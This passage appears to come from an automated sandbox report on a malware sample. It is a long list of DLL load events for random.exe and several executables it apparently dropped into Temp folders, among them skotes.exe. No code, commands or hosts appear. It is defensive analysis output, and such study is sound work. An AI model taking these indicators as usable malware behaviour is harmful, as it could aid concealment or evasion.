Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: sspicli.dll
